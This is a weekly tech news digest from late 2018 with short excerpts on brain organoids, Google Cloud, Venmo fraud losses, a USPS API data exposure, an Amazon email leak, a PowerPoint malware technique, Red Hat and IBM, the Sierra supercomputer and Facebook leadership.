The haze of Thanksgiving and Black Friday is wearing off and several companies have found themselves with security issues.
Amazon, Venmo (Paypal) the United States Postal Service, and Microsoft have all been dealing with potential bugs and vulnerabilities (at various levels of severity).
Facebook continues to have exposure to social vulnerabilities – and things are getting tense: Sheryl Sandburg is rumored to be fearing for her job, but Mark Zuckerberg says she isn’t going anywhere (for now).
Artificial Intelligence
- Lab-Grown Mini-Brains Spontaneously Produced ‘Human-Like’ Brain Waves for the First Time
After the brain organoids had been growing in petri dishes for about six months, the researchers noticed that the electrical activity they were measuring was occuring at a higher rate than had ever been documented before in lab-grown organoids. Even more surprising, however, was that this electrical activity didn’t resemble the synchronized activity seen in mature human brains. Instead, the electrical patterns were chaotic, a hallmark of a developing brain.
When Muotri and his colleagues compared the organoids’ electrical activity to that seen in premature babies, they found that it was strikingly similar to the patterns seen in babies born 25-39 weeks after conception.
Cloud
- Google’s cloud business under Greene was plagued by internal clashes, missed acquisitions, insiders say
Google’s lack of big deals has puzzled analysts given how aggressive the major software vendors have been at opening their wallets to win in the cloud. In two of the year’s biggest deals — IBM’s $34 billion purchase of Red Hat and Microsoft’s $7.5 billion acquisition of GitHub — Google was involved in talks but ultimately came up short, according to people familiar with the matter.
Greene wanted to buy GitHub but Pichai was less enthusiastic, unclear why Google would spend big money to get into the market for developer tools, said a person close to the business. Google’s bid for GitHub, whose cloud software lets programmers collaborate and share code, came in at just under $6 billion, and it declined to raise the price after being told of Microsoft’s offer, the person said.
Security
- Venmo Caught Off Guard by Fraudsters
In the first three months of 2018, the digital money-transfer service owned by PayPal Holdings Inc. PYPL -1.48% recorded an operating loss of about $40 million—nearly 40% larger than the loss for which the company had budgeted, according to internal documents reviewed by The Wall Street Journal.
Expenses related to fraudulent transactions were a big factor. The so-called transaction loss rate, which includes losses related to fraudulent charges, rose from about 0.25% of overall Venmo volume in January to 0.40% in March. The company had been shooting for a rate of roughly 0.24% in those periods, according to the documents.
https://www.wsj.com/articles/venmo-caught-off-guard-by-fraudsters-1543068120?ns=prod/accounts-wsj
- USPS took a year to fix a vulnerability that exposed all 60 million users’ data
The vulnerability included all 60 million user accounts on the website. It was caused by an authentication weakness in the site’s application programming interface (API) that allowed anyone to access a USPS database offered to businesses and advertisers to track user data and packages. The API should have verified whether an account had permissions to read user data but USPS didn’t have such controls in place.
Users’ personal data including emails, phone numbers, mailing campaign data were all exposed to anyone who was logged into the site. Additionally, any user could request account changes for another user, so they could potentially change another account’s email address and phone number, although USPS does at least send a confirmation email to confirm the changes.
- Amazon leaks users’ names and emails in ‘technical error’
When contacted for comment, Amazon said that neither its website nor any of its systems had been breached and that it has “fixed the issue and informed customers who may have been impacted.” It did not reveal the number of accounts affected or which countries the users are located in. Twitter users across Europe and the United States have reported receiving the email, and forum posts suggest that the error affected consumer rather than business accounts on the platform.
Characterizing this as a “technical error” means that the incident is unlikely to be related to reports of Amazon firing employees for sharing customer emails with third-party sellers, but the lack of information makes it difficult to establish exactly what happened. We have reached out to the UK’s Information Commissioner’s Office, which Amazon would have needed to inform in the event of a breach, for comment.
https://www.theverge.com/2018/11/21/18106306/amazon-email-address-leak-technical-error-phishing
- Hackers May Exploit Microsoft PowerPoint For Malware Attacks
As explained, the malicious file involved in this attack method appears to have a blank page, but secretly connects to a malicious link. Ramilli analyzed the slide structure and noticed an external OLEobject. Upon further analysis, he found the target device already infected by the file downloaded on the system, that is, wraeop.sct. After this step, stage 3 of the attack begins that utilises an internal image to execute additional code leading to stage 4 – the payload execution.
The researcher suspects the malware to be AzoRult after performing traffic analysis and considering the C&C admin.
Software/SaaS
- Red Hat to be ‘Switzerland’ within IBM
According to Marco Bill-Peter, Red Hat senior vice president of customer experience and engagement, Red Hat will function as an independent, distinct unit within IBM’s Hybrid Cloud team and maintain its commitment to open source principles.
https://www.computerworld.com.au/article/649888/red-hat-switzerland-within-ibm/
Red Hat Says IBM Acquisition Won’t Change Its Culture — But Can It Change Theirs?“There is a commitment from them and a commitment from us as well: we stay true to open source. The other one is [Red Hat will] operate as an independent distinct unit and preserve our unique culture.”
Significantly changing its culture could cause many of Red Hat’s 13,000 employees to leave, Bill-Peter said. It could also scare off long time partners like Amazon and Google from collaborating on “the next open hybrid cloud”. But Bill-Peter has little doubt IBM is committed to their independence.
https://which-50.com/red-hat-says-ibm-acquisition-wont-change-its-culture-but-can-it-change-theirs/
Datacenter/Hardware
- America’s nuclear arsenal relies on this brand-new supercomputer
In an expansive white-tiled room in Livermore, California sits Sierra, the world’s second most powerful supercomputer. Sierra looks like an unassuming server farm, but is actually a massive connected hive of 190,000 processing cores. It was completed earlier this year, and has been on a shakedown cruise since then: researchers at the Lawrence Livermore National Laboratory ran astrophysics, climate, and precision medicine simulations on Sierra while ferreting out bad components and other technical hiccups.
But early next year, Sierra’s real work will begin. The system will be “air gapped,” meaning that it will be disconnected from any external network to prevent unauthorized access. Once that happens, it can begin the calculations it was purpose-built to carry out: simulations of nuclear weapons launches and detonations.
Other
- With Facebook at ‘War,’ Zuckerberg Adopts More Aggressive Style
Mr. Zuckerberg, who previously set annual goals such as to learn Mandarin and read 25 books, said this year he would focus on fixing Facebook. He believes this tougher management style is necessary to tackle challenges being raised both internally and externally, according to a person familiar with his thinking.
Mr. Zuckerberg’s new posture could trouble those who feel his “move fast, break things” mantra from Facebook’s early days contributed to many of the company’s current problems. It also has led to confrontations with some of his top reports, including Ms. Sandberg, who has long had considerable autonomy over the Facebook teams that control communications and policy.
https://www.wsj.com/articles/with-facebook-at-war-zuckerberg-adopts-more-aggressive-style-1542577980
Zuckerberg says stepping down at Facebook is ‘not the plan’Otherwise, he seemed unwilling to change his role or step down as leader of the company, and of COO Sandberg said “I hope we work together for decades more to come.” Separately, tonight TechCrunch reports that an internal memo showed outgoing policy head Eliot Schrager take responsibility for the company hiring Definers, a PR firm that spread negative publicity about competitors and pushed angles linking George Soros to critics. In the memo Schrage said Facebook did ask them to do work relating to Soros and that Definers reached out to members of the press showing that he funded some people who were critical of the company.
https://www.engadget.com/2018/11/20/zuckerberg-says-stepping-down-at-facebook-is-not-the-plan/
Photo: Almos Bechtold